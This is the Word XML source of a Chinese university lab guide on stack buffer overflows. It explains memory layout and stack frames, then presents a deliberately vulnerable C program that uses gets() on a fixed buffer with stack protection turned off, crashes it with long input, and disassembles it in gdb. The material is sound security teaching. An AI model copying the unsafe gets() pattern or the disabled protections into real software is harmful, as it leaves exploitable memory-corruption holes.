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C0" w:rsidRDefault="00D83F3A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:t>二</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E0C4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区溢出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:t>分析与验证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00FD5BF1" w:rsidP="00580CC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0C4C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验需知</w:t>
      </w:r>
    </w:p>
    <w:p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指导书中横线范围内为终端运行结果</w:t>
      </w:r>
    </w:p>
    <w:p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带下划线的字段为输入的命令</w:t>
      </w:r>
    </w:p>
    <w:p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虚拟机中释放鼠标的快捷键为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ctrl+Alt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62DC0" w:rsidRDefault="00E62DC0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRPr="008357D0" w:rsidRDefault="008357D0" w:rsidP="00580CC1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi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477B" w:rsidRPr="00E0477B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓冲区溢出</w:t>
      </w:r>
      <w:r w:rsidR="00E0477B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00E0477B">
        <w:t>预备</w:t>
      </w:r>
      <w:r w:rsidRPr="008357D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>知识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预备知识</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>: Linux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x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>体系结构，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>汇编，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语言，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="00B668DD" w:rsidP="008357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7" w:history="1">
        <w:r w:rsidR="008357D0">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>PC Assembly Language</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="00B668DD" w:rsidP="008357D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8" w:history="1">
        <w:r w:rsidR="008357D0">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>gcc x86 Assembly Quick Reference</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="00B668DD" w:rsidP="008357D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9" w:history="1">
        <w:r w:rsidR="008357D0">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>GDB Quick Reference</w:t>
        </w:r>
      </w:hyperlink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缓冲区溢出（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5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：在计算机安全和程序设计中的一种异常，当一个程序向缓冲区写入数据时，超出了缓冲区边界并且覆盖了相邻内存。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调用栈（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>call stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5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：用于存储程序中运行子例程信息的栈数据结构，先入后出。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栈缓冲区溢出（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>stack buffer overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5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：程序向调用栈中原本缓冲区之外的内存地址写入数据，意图获取对指令指针的控制，将其指向恶意代码。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Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>进程内存布局</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="00B668DD" w:rsidP="008357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10" w:history="1">
        <w:r w:rsidR="008357D0">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>Memory Layout (Virtual Address Space of a C process)</w:t>
        </w:r>
      </w:hyperlink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+——————————————+ 0xFFFFFFFF (high address)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kernel space | 1GB/4GB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+——————————————+ 0xC0000000 == TASK_SIZE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stack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+——————————————+&lt;——— stack pointer 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|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v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|      ^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|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|memory mapping|&lt;——— dynamically linked lib (*.so)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+——————————————+ 0x40000000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^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|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+——————————————+&lt;——— brk() point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heap     |&lt;——— malloc(), free()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+——————————————+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bss seg    |&lt;———uninitialized data (Block Started by Symbol)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+——————————————+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data seg    |&lt;———initialized static data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+——————————————+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text seg    |&lt;——- binary code (*.o), static lib (*.a)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+——————————————+ 0x08048000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unused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+——————————————+ 0x00000000 (low address)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字节序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>little-endian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：低字节在前，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比特值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>B3B2B1B0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+——+——+——+——+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|B0|B1|B2|B3|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+——+——+——+——+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  —————&gt;  high address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栈帧（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>stack frame</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a5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：函数调用数据结构单元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caller’s stack pointer (old %esp)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arguments       |               |                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|               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return address     | (old %eip)    v             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+———————————————————————-+&lt;——— callee’s sf (new %ebp)                           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caller’s sf pointer   |———&gt; caller’s sf (old %ebp)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local variables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|&lt;——— callee’s stack pointer (new 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v            |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caller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调用者；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>被调用者，即子函数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arguments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：子函数参数，调用前入栈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address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子函数调用前将待执行下一条指令地址保存在返回地址中，待函数调用结束后，返回到调用者继续执行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eip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指令指针指向下一条指令地址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stack frame pointer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>栈帧指针指向调用者的栈帧基址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ebp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ebp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基址指针指向栈帧底（高地址）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esp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栈指针指向栈顶（低地址）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e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>表示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%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>表示寄存器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:pStyle w:val="a4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caller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（调用者）规则：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D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子函数参数入栈，从右向左</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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指令，将下一条指令地址入栈（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push %eip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>），并无条件跳转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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子函数返回，返回值在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eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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callee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（被调用者）规则：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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保存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>caller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>的栈基址，设定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>callee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>新的栈基址为当前栈指针（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push %ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>;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mov %esp, %ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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为局部变量分配栈空间（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sub 123,%esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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执行函数，结果保存在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eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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复合指令，清除当前栈帧，恢复到调用者栈帧（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mov %ebp, %esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>;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 %ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9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指令（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 %eip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="00B668DD" w:rsidP="008357D0">
      <w:pPr>
        <w:spacing w:before="360" w:after="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#24292e" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRPr="003E0C4C" w:rsidRDefault="008357D0" w:rsidP="003E0C4C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E0C4C">
        <w:rPr>
          <w:rStyle w:val="a5"/>
        </w:rPr>
        <w:t>栈缓冲区溢出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研究一个存在缓冲区溢出漏洞的程序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readreq.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>，该程序读入用户输入的数字后，打印输出。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#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include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&lt;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stdio.h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&gt;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read_req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buf[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128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i;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gets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buf);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 =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atoi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buf);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return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i;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main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ac,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**av) {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x =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read_req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();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printf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x=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%d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 x);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编译命令：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$ cat Makefile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objects = readreq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cc = gcc -m32 -static -g -Wno-deprecated-declarations -fno-stack-protector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>.c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cc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 xml:space="preserve">.c -o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clean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rm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</w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0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Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
          <w:sz w:val="24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-m32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编译为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位程序</w:t>
      </w:r>
    </w:p>
    <w:p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-static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静态链接</w:t>
      </w:r>
    </w:p>
    <w:p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-g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加入调试信息</w:t>
      </w:r>
    </w:p>
    <w:p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-Wno-deprecated-declarations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不对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>deprecated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（废弃）内容发出警告，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gets()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>已经被废弃</w:t>
      </w:r>
    </w:p>
    <w:p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-fno-stack-protector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不注入用于防止缓冲区溢出的代码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编译并运行程序，查看不同输入下的输出。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$ make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gcc -m32 -static -g -Wno-deprecated-declarations -fno-stack-protector readreq.c -o readreq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/tmp/ccXK2Fse.o: In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`read_req':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/home/httpd/lecture1/readreq.c:6: warning: the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function is dangerous and should not be used.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$ ./readreq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123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x=123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$ ./readreq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AAAAAAA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x=0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$ ./readreq [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缓冲区溢出示例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]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lastRenderedPageBreak/>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
    </w:p>
    <w:p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Segmentation fault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下面用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>调试程序，通过反汇编技术研究缓冲区溢出细节。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gdb ./readreq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b read_req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函数设置断点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Breakpoint 1 at 0x8048e4d: file readreq.c, line 6.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r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Starting program: /home/httpd/lecture1/readreq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Breakpoint 1, read_req () at readreq.c:6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6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gets(buf);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info registers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查看寄存器信息，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十六进制，十进制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翻译，说明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            0x1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累加器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ecx            0x52987f86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1385725830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计数器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edx            0xbffff704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-1073744124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数据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            0x80481a8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 134513064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基址，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            0xbffff610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0xbffff610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栈指针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            0xbffff6b8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0xbffff6b8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基址指针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            0x0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源索引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edi            0x80eb00c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135180300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目标索引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            0x8048e4d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0x8048e4d &lt;read_req+9&gt;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指令指针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eflags         0x28 [ SF IF ]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标志寄存器，符号标记，中断允许标记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cs             0x73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115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代码段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             0x7b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123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堆栈段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ds             0x7b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123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数据段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             0x7b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123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附加段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fs             0x0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  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无明确定义，字母表中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之后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gs             0x33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51 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无明确定义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g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之后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反汇编：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disass read_req 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反汇编，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AT&amp;T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风格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Dump of assembler code for function read_req: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0x08048e44 &lt;+0&gt;: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%ebp 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将旧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%ebp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入栈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0x08048e45 &lt;+1&gt;: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%esp,%ebp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%esp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来设定新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%ebp]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0x08048e47 &lt;+3&gt;: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$0xa8,%esp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栈增长，留出局部变量空间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=&gt; 0x08048e4d &lt;+9&gt;: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-0x8c(%ebp),%eax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&amp;buf[0]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…*]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0x08048e53 &lt;+15&gt;: mov    %eax,(%esp)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移入栈顶，向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gets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传递参数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0x08048e56 &lt;+18&gt;: call   0x804fc90 &lt;gets&gt;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%eip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入栈并调用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0x08048e5b &lt;+23&gt;: lea    -0x8c(%ebp),%eax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&amp;buf[0]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0x08048e61 &lt;+29&gt;: mov    %eax,(%esp) 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移入栈顶，传递参数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0x08048e64 &lt;+32&gt;: call   0x804dd10 &lt;atoi&gt;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0x08048e69 &lt;+37&gt;: mov    %eax,-0xc(%ebp)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结果写入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0x08048e6c &lt;+40&gt;: mov    -0xc(%ebp),%eax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写入函数返回值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0x08048e6f &lt;+43&gt;: leave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弹出整个栈帧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0x08048e70 &lt;+44&gt;: ret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弹出栈中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%eip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，并跳转执行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:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指令将操作数压入栈中。在压栈前，将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esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>值减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X86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>栈增长方向与内存地址编号增长方向相反），然后将操作数压入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esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指示位置。</w:t>
      </w:r>
    </w:p>
    <w:p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指令与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push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指令相反。先将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esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指示地址中内容出栈，然后将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esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>值加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。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008357D0" w:rsidRDefault="008357D0" w:rsidP="008357D0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栈增长（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>168 bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>）要超过局部变量大小之和（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>4+128 bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>），并按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>16 bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>对齐</w:t>
      </w:r>
    </w:p>
    <w:p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lea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">: load effective address, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>拷贝地址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而不是内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p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相当于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mov %ebp,%esp</w:t>
      </w:r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 %ebp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>，此时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esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>指向返回地址</w:t>
      </w:r>
    </w:p>
    <w:p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 %eip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
